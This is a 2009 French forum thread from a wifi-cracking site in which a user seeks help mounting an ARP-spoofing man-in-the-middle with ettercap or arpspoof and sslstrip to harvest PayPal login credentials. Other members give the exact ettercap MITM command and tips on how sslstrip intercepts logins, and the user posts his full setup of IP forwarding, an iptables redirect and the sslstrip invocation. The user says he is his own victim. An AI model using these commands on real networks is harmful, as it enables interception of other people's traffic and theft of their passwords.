Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 06-12-2009 01:04:11

123456789
Membre
Inscription : 12-11-2009
Messages : 10

Ettercap

Bonjour a tous,
En fait, je suis pas sur Backtrack, mais sur Ubuntu, c'est bizarre, je sais mais BT ne me convient comme OS de tous les jours, VMplayer rame pas mal, et mon live CD fonctionne pas...:/
Le paquet Ettercap est installé et j'aimerai me mettre en MAN IN THE MIDDLE pour finaliser une attaque Sslstrip. Dans le tuto de M1cK3y, il se met en cette position avec arpspoof, qui ne marche pas avec ubuntu (une partie des inconvenients). Venons en aux faits: quelle la commande de Ettercap pour se mettre en MAN IN THE MIDDLE ?

[email protected]:~$ ettercap -i wlan0 -t XX.XXX.42.129 XX.XXX.127.255

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA


Incorrect number of token (//) in TARGET !!

[email protected]:~$

Voici le resultat (non concluant ^^') quand j'ai uniquement remplacé arpspoof par ettercap
XX.XXX.42.129 = ip
XX.XXX.127.255 = ip routeur
Je suis en wifi, ma victime c'est moi...:cool:

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 06-12-2009 02:26:54

SbZ
Membre V.I.P.
Lieu : ~
Inscription : 01-03-2009
Messages : 272

Re : Ettercap

Salut,

en root :

ettercap -T -M arp:remote /IP_Victime/ /IP_Routeur/ -w result -i wlan0

* -T : lance ettercap en mode texte
* -M : indique que l'on veut une attaque de type "Man in the middle"
* -w : enregistre le résultat de la capture dans un fichier
* -i : interface

Après tu peut éventuellement ouvrir ton fichier de sortie (pcap) avec un logiciel comme wireshark (#apt-get install wireshark) pour analyser chaque requête faite à travers le réseau.

Dernière modification par SbZ (06-12-2009 02:41:24)

Hors Ligne

#3 06-12-2009 18:01:56

123456789
Membre
Inscription : 12-11-2009
Messages : 10

Re : Ettercap

BOUM BADABOUM.......
Merci pour ta reponse SbZ: alors que Ettercap semblait tres tres actif dans le terminal, lorsque je suis allé sur Paypal, c'etait toujours du HTTPS, et en plus malgré la requete que j'avais renvoyé, il n'a rien du tout intercepté...J'avoue que je suis perplexe, surtout que dans la barre d'adresse, il y avait marqué ca:

http://www.paypal.com/fr/?PPREDIRECT=dH … 1019c8adab

Je ne pense pas que le PPREDIRECT soit normal...une solution ?
En essayant avec arpspoof, voila mon resultat:

[email protected]:~# arpspoof -i wlan0 -t XX.XXX.XX.218 XX.XXX.XXX.255
arpspoof: couldn't arp for host XX.XXX.XX.218
[email protected]:~#

oui, je sais mon Ip a changé entre temps, mais je ne sais pas comment ca se fait...Peut etre ca vient de mon reseau ? Une solution miracle big_smile:D:D SVP

Dernière modification par 123456789 (06-12-2009 20:27:11)

Hors Ligne

#4 06-12-2009 20:36:57

123456789
Membre
Inscription : 12-11-2009
Messages : 10

Re : Ettercap

Ah, euh oui...desolé de ce double post, mais la curiosité m'a monté au nez..
Ai-t-on vraiment obligé de rajouter avec Ettercap

-w result

? Parce que avec la commande

python ~/sslstrip.py -w log.txt -a -l 15000 -f

on enrengistre deja les données quelque part, non ?:|

Hors Ligne

#5 06-12-2009 20:49:04

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Ettercap

En effet, mais SSLstrip ne va enregistrer que les logs du http "strippé", alors que Ettercap va enregistrer l'intégralité des données qui seront interceptées lors de l'attaque Man in the middle. Si le but de ton pentest est juste de réussir la récupération d'un couple de login / password sur du https strippé alors tu n'as pas besoin d'utiliser le paramètre -w sous Ettercap.

Hors Ligne

#6 06-12-2009 22:42:11

123456789
Membre
Inscription : 12-11-2009
Messages : 10

Re : Ettercap

Merci de ta reponse M1ck3y, si j'ai bien compris ettercap est donc un peu mieux que arpspoof parce qu'il peut sniffé plus de données...Je crois avoir trouvé une solution à mon post #3: Je n'ai pas mis toutes les commandes de la mise en ecoute dans un terminal different, ce qui peut les entraver, je reste ouvert a toute solution. Je vais ré-essayer et je vous tiens au courant.:)

Hors Ligne

#7 19-12-2009 00:18:05

123456789
Membre
Inscription : 12-11-2009
Messages : 10

Re : Ettercap

Bon, svp, ca vous dirait pas, les doués, de m'eclairer un peu. C'est vrai, ca ne vous coute absolument rien, a part, rendre encore mieux crack-wifi.com... Allez quoi. Bon, je vais prendre mes clic et mes clac de cette communité de vieux, jusqu'a ce que vous preniez de la vitamine C
hmmmadroll:(

Hors Ligne

#8 19-12-2009 00:31:28

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Ettercap

Il n'y a pas eu de nouvelles réponses sur ton topic puisqu'aux dernières nouvelles:

123456789 a écrit :

Je vais ré-essayer et je vous tiens au courant.:)

Alors si tu es toujours bloqué, essayes de développer et de nous expliquer dans les moindres détails ton test, histoire que l'on puisse comprendre d'ou pourrait venir le souci.

Hors Ligne

#9 19-12-2009 15:26:13

123456789
Membre
Inscription : 12-11-2009
Messages : 10

Re : Ettercap

OS:  Ubuntu 9.04
Moy. de connexion:  Clé usb wifi à norme maxi 54m/bits
Essai avec:   Paypal.fr

Mon probleme actuel, c'est que malgré toutes les commandes  mises en place, et qui ont l'air d'etre active, Paypal reste du HTTPS, ou je peux meme voir le detenteur du certificat. Bref, mon attaque est un echec total...

[email protected]:~$ tar xvzf sslstrip-0.2.tar.gz
sslstrip-0.2/COPYING
sslstrip-0.2/lock.ico
sslstrip-0.2/README
sslstrip-0.2/setup.py
sslstrip-0.2/sslstrip/
sslstrip-0.2/sslstrip/SecureLinkListener.py
sslstrip-0.2/sslstrip/DataShuffler.py
sslstrip-0.2/sslstrip/ShuffleSocket.py
sslstrip-0.2/sslstrip/SSLDataShuffler.py
sslstrip-0.2/sslstrip/SSLShuffleSocket.py
sslstrip-0.2/sslstrip/RetrySecureException.py
sslstrip-0.2/sslstrip/__init__.py
sslstrip-0.2/sslstrip/CookieCleaner.py
sslstrip-0.2/sslstrip.py
[email protected]:~$ cd sslstrip-0.2/
[email protected]:~/sslstrip-0.2$ python setup.py install
running install
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
running install_lib
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
error: could not delete '/usr/local/bin/sslstrip': Permission denied
[email protected]:~/sslstrip-0.2$ echo "1" > /proc/sys/net/ipv4/ip_forwardbash: /proc/sys/net/ipv4/ip_forward: Permission non accordée
[email protected]:~/sslstrip-0.2$ sudo -i
[sudo] password for kratein: 
[email protected]:~# echo "1" > /proc/sys/net/ipv4/ip_forward
[email protected]:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 15000
[email protected]:~# python /home/kratein/sslstrip-0.2/sslstrip.py -w log.txt -a -l 15000 -f

Apres ca, lorsque je suis en root pour pouvoir faire ce que je veux, a partir de la derniere commande, le texte

[email protected]

ne réapparait pas, donc j'en deduis que tout se passe bien, le machin fait son boulot...
J'essayes donc de me mettre en "Man in the Middle" avec Arpspoof, mais ca donne ca

[email protected]:~$ arpspoof -i wlan0 -t 78.251.xx.xxx 78.251.xxx.xxx
arpspoof: libnet_init(): UID or EUID of 0 required

donc je decide d'essayer avec ettercap, avec la commande que m'a gentiment donné SbZ, il y a plein de texte qui defile, tout semble normal...je vais sur paypal, et la...meme plus de PPREDIRECT  comme dans post #3, c'est du HTTPS pur et dur....

Hors Ligne

#10 19-12-2009 15:56:33

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Ettercap

Tu devrais tester avec autre chose que le site Paypal, car ils ont peut etre trouvé une parade au tool de Moxie Marlinspyke. Et pour que SSLstrip fonctionne, tu ne dois pas te connecter directement sur le login en https, mais passer par l'accueil en http, c'est la base du fonctionnement de l'outil.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
20 234 10-11-2016 12:54:26 par koala
2 532 27-10-2015 00:21:23 par zoz25
1 909 15-03-2014 08:57:27 par Furyo
MITM Ettercap HTTPS ? par Endless-Hacking
2 1196 12-08-2013 13:24:07 par Volkow
8 1296 30-07-2013 21:25:24 par Speedfan

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]